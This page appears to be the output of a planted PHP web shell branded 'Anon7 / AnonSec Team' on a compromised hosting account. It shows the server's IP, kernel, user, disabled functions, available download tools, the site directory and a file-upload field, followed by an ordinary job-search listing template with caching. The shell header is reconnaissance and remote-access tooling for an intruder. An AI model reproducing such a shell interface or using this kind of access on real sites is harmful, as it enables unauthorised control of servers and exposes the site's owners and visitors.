| Server IP : 77.37.53.89 / Your IP :
216.73.216.152 [
Web Server : LiteSpeed System : Linux nl-srv-web1124.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64 User : u964240598 ( 964240598) PHP Version : 8.2.29 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/u964240598/domains/rafikiwema.org/public_html/list/ |
Upload File : |
<?php
if (file_exists($cache_file) && time() - $cache_time < filemtime($cache_file)) { //check Cache exist and it's not expired.
ob_start(); //Turn on output buffering, "ob_gzhandler" for the compressed page with gzip.
readfile($cache_file); //read Cache file
//echo '<!-- cached page - '.date('l jS \of F Y h:i:s A', filemtime($cache_file)).', Page : '.$dynamic_url.' -->';
ob_end_flush(); //Flush and turn off output buffering
exit(); //no need to proceed further, exit the flow.
}
if ($caching == False && count($result) == 0) { //check Cache exist and it's not expired.
exit(); //no need to proceed further, exit the flow.
}
//Turn on output buffering with gzip compression.
ob_start();
?>
<div class="clearfix"></div>
<!-- Header Container / End -->
<!-- Spacer -->
<div class="margin-top-90"></div>
<!-- Spacer / End-->
<!-- Page Content
================================================== -->
<div class="container">
<div class="row">
<div class="col-xl-3 col-lg-4">
<div class="sidebar-container">
<!-- Job Types -->
<div class="sidebar-widget">
<h3>Trending Search</h3>
<div class="switches-list">
</div>
</div>
</div>
</div>
<div class="col-xl-9 col-lg-8 content-left-offset">
<h3 class="page-title">Search Results</h3>
<div class="listings-container margin-top-35">
<?php
$datenow = time();
foreach ($result as $i => $val) {
if ($val["title"] == '') {
unlink(__DIR__ . "/cache-data/{$val["jk"]}.json");
}
$basedate = substr($val['pubDate'], 0, 10);
$datepost = date("Y-m-d", $basedate);
$datevalid = $basedate + (864000*3);
$datevalid = date("Y-m-d", $datevalid);
$datestamp = floor((time() - $basedate) / 86400);
if ($datestamp == 0){
$datestamp = 'Today';
}
if ($datestamp != 0 && $datestamp <= 29){
$datestamp = $datestamp.' days ago';
}
if ($datestamp != 0 && $datestamp >= 30){
$datestamp = '30+ days ago';
}
if(ENKRIPSI == True){
$val['jk'] = $val['crypted'];
}
$location_link = explode(",", $val['location']);
$location_link = $location_link[0];
if ($val["title"] != '' || $service->slugify($val['title']) !='n-a' ) {
?>
<!-- Job Listing -->
<div class="job-listing">
<!-- Job Listing Details -->
<div class="job-listing-details">
<!-- Details -->
<div class="job-listing-description">
<h4 class="job-listing-company"><?=$val['company']?></h4>
<h3 class="job-listing-title"><a href="<?= SITE_HOST . '/job/' . $service->slugify($val['title']).'-at-'.$service->slugify($val['company']). '-'.$service->slugify($val['location']). '-' . $val['jk']?>"><?= $val['title']?> at <?=$val['company']?></a></h3>
<p class="job-listing-text"><?= preg_replace('/[[:^print:]]/', '', $val['sumary']); ?></p>
</div>
</div>
<!-- Job Listing Footer -->
<div class="job-listing-footer">
<ul>
<li><i class="icon-material-outline-location-on"></i> <?= $val['location'] ?></li>
<li><i class="icon-material-outline-business-center"></i> Full Time</li>
<?php
if ($val['salary'] != ''){
echo '<li><i class="icon-material-outline-account-balance-wallet"></i> '.$val['salary'].'</li>';
}
?>
<li><i class="icon-material-outline-access-time"></i> <?= $datestamp ?></li>
</ul>
</div>
</div>
<?php } }?>
</div>
</div>
</div>
</div>
<?php
######## Your Website Content Ends here #########
if (!is_dir($cache_folder)) { //create a new folder if we need to
mkdir($cache_folder);
}
if(!$ignore){
$fp = fopen($cache_file, 'w'); //open file for writing
fwrite($fp, ob_get_contents()); //write contents of the output buffer in Cache file
fclose($fp); //Close file pointer
}
ob_end_flush(); //Flush and turn off output buffering
?>Anon7 - 2022
AnonSec Team